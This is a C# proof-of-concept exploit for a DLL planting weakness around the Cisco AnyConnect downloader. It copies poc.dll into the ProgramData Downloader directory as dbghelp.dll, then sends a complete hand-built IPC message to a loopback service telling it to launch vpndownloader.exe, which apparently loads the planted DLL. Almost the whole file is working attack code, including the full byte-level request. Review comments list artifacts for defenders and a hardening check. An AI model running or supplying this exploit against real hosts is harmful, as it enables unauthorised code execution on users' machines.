using System;
using System.IO;
using System.Net.Sockets;
/// <summary>
/// Proof-of-concept for a DLL search-order (planting) weakness around the Cisco AnyConnect
/// downloader. It copies <c>poc.dll</c> from the current directory into the ProgramData
/// "Temp\Downloader" directory under the name <c>dbghelp.dll</c>, then sends one prebuilt
/// IPC message to a TCP listener on 127.0.0.1:62522 that names <c>vpndownloader.exe</c>
/// as the file to launch.
/// </summary>
/// <remarks>
/// NOTE(review): nothing in this file shows who owns the listener, which privileges the
/// launched process gets, or from where it resolves dbghelp.dll; the PoC presumably relies
/// on the launched downloader loading the planted DLL from the Downloader directory. Confirm
/// against the vendor advisory.
/// Observable artifacts for defenders, all taken from the constants below: a file named
/// dbghelp.dll created or overwritten under TARGET_DIRECTORY, and a loopback connection to
/// port 62522 from a process that is not the AnyConnect client itself. Remediation is the
/// vendor's fixed client release (version not stated on this page); restricting write access
/// to the Downloader directory is a reasonable hardening check.
/// </remarks>
public static class Poc {
// Complete wire image of one IPC "launch" request: a 26-byte header followed by five
// type/length/value fields. The header length fields match the byte counts when read
// low byte first (0x001A = 26, 0x00E4 = 228); the TLV type/length fields match when
// read high byte first (e.g. 0x0057 = 87 bytes, including the trailing NUL).
// Field names are the original author's labels; their meaning to the receiving service
// is not shown in this file.
private readonly static byte[] LAUNCH_COMMAND = new byte[] {
// Signature
// ASCII "OCSC"
0x4F, 0x43, 0x53, 0x43,
// Message header length
0x1A, 0x00,
// Message body length
0xE4, 0x00,
// IPC response
0xFF, 0xFF, 0xFF, 0xFF,
// Message user context
0x00, 0x00, 0x00, 0x00,
// Request message identifier
0x02, 0x00, 0x00, 0x00,
// Return IPC object
0x00, 0x00, 0x00, 0x00,
// Message type
0x01,
// Message identifier
0x02,
// File path
// C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe
0x00, 0x01, // Type
0x00, 0x57, // Length
0x43, 0x3A, 0x5C, 0x50, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x46,
0x69, 0x6C, 0x65, 0x73, 0x20, 0x28, 0x78, 0x38, 0x36, 0x29, 0x5C, 0x43,
0x69, 0x73, 0x63, 0x6F, 0x5C, 0x43, 0x69, 0x73, 0x63, 0x6F, 0x20, 0x41,
0x6E, 0x79, 0x43, 0x6F, 0x6E, 0x6E, 0x65, 0x63, 0x74, 0x20, 0x53, 0x65,
0x63, 0x75, 0x72, 0x65, 0x20, 0x4D, 0x6F, 0x62, 0x69, 0x6C, 0x69, 0x74,
0x79, 0x20, 0x43, 0x6C, 0x69, 0x65, 0x6E, 0x74, 0x5C, 0x76, 0x70, 0x6E,
0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x65, 0x72, 0x2E, 0x65,
0x78, 0x65, 0x00,
// Command line (command line should start with "CAC-" or other valid command)
// CAC-doesnt-matter
0x00, 0x02, // Type
0x00, 0x12, // Length
0x43, 0x41, 0x43, 0x2D, 0x64, 0x6F, 0x65, 0x73, 0x6E, 0x74, 0x2D, 0x6D,
0x61, 0x74, 0x74, 0x65, 0x72, 0x00,
// GUI desktop (not mandatory)
// WinSta0\Default
0x00, 0x04, // Type
0x00, 0x10, // Length
0x57, 0x69, 0x6E, 0x53, 0x74, 0x61, 0x30, 0x5C, 0x44, 0x65, 0x66, 0x61,
0x75, 0x6C, 0x74, 0x00,
// Use installed
// False
// Zero-length field: only the type and a length of 0 are sent, no value bytes.
0x80, 0x05,
0x00, 0x00,
// Relocatable file path
// C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe
// Same 87 bytes as the "File path" field above.
0x00, 0x06,
0x00, 0x57,
0x43, 0x3A, 0x5C, 0x50, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x46,
0x69, 0x6C, 0x65, 0x73, 0x20, 0x28, 0x78, 0x38, 0x36, 0x29, 0x5C, 0x43,
0x69, 0x73, 0x63, 0x6F, 0x5C, 0x43, 0x69, 0x73, 0x63, 0x6F, 0x20, 0x41,
0x6E, 0x79, 0x43, 0x6F, 0x6E, 0x6E, 0x65, 0x63, 0x74, 0x20, 0x53, 0x65,
0x63, 0x75, 0x72, 0x65, 0x20, 0x4D, 0x6F, 0x62, 0x69, 0x6C, 0x69, 0x74,
0x79, 0x20, 0x43, 0x6C, 0x69, 0x65, 0x6E, 0x74, 0x5C, 0x76, 0x70, 0x6E,
0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x65, 0x72, 0x2E, 0x65,
0x78, 0x65, 0x00
};
// Directory the DLL is planted in. It sits under ProgramData rather than Program Files;
// NOTE(review): the PoC presumes an unprivileged user may create and write it - verify
// the ACL on affected hosts, since that write access is the precondition for the issue.
private readonly static string TARGET_DIRECTORY =
"C:\\ProgramData\\Cisco\\Cisco AnyConnect Secure Mobility Client\\Temp\\Downloader";
// File name the planted DLL is given; it matches the name of a standard Windows system
// library, so a file with this name in TARGET_DIRECTORY is the artifact to look for.
private readonly static string TARGET_DLL =
"dbghelp.dll";
// Source DLL; a relative name, so it is resolved against the current working directory.
private readonly static string PAYLOAD_DLL =
"poc.dll";
/// <summary>
/// Runs the PoC: ensures TARGET_DIRECTORY exists, copies PAYLOAD_DLL into it as TARGET_DLL
/// (overwriting any existing file), connects to 127.0.0.1:62522, writes LAUNCH_COMMAND and
/// waits for a single response byte.
/// </summary>
/// <param name="arguments">Command-line arguments; not read by this method.</param>
/// <remarks>
/// Every failure (missing payload, copy denied, connection refused, read timeout) ends up
/// in the catch-all below and is only printed to standard error; the process exit code is
/// not changed, so callers cannot tell success from failure by exit status.
/// </remarks>
public static void Main(string[] arguments) {
TcpClient tcpClient = null;
try {
// Stage 1: file-system side. Creates the Downloader directory if it is absent.
DirectoryInfo targetDirectory = new DirectoryInfo(TARGET_DIRECTORY);
if (targetDirectory.Exists == false)
{
targetDirectory.Create();
}
FileInfo payloadDll = new FileInfo(PAYLOAD_DLL);
if (payloadDll.Exists == false)
{
throw new Exception("Payload DLL missing from current directory");
}
// The 'true' argument overwrites an existing dbghelp.dll in the target directory.
payloadDll.CopyTo(Path.Combine(targetDirectory.FullName,
TARGET_DLL), true);
// Stage 2: IPC side. Loopback only; the message is sent as-is, with no
// authentication step or handshake visible in this file.
tcpClient = new TcpClient("127.0.0.1", 62522);
NetworkStream clientStream = tcpClient.GetStream();
// Bound the wait for a reply to 5 seconds.
clientStream.ReadTimeout = 5000;
clientStream.Write(LAUNCH_COMMAND, 0, LAUNCH_COMMAND.Length);
clientStream.Flush();
// Reads one byte and discards it; the response content is never inspected.
clientStream.ReadByte();
}
catch (Exception exception) {
// Best-effort diagnostics only: the exception is printed and then dropped.
Console.Error.WriteLine(exception);
}
finally {
// Close the connection whether or not the exchange succeeded.
if (tcpClient != null) {
tcpClient.Close();
}
}
}
}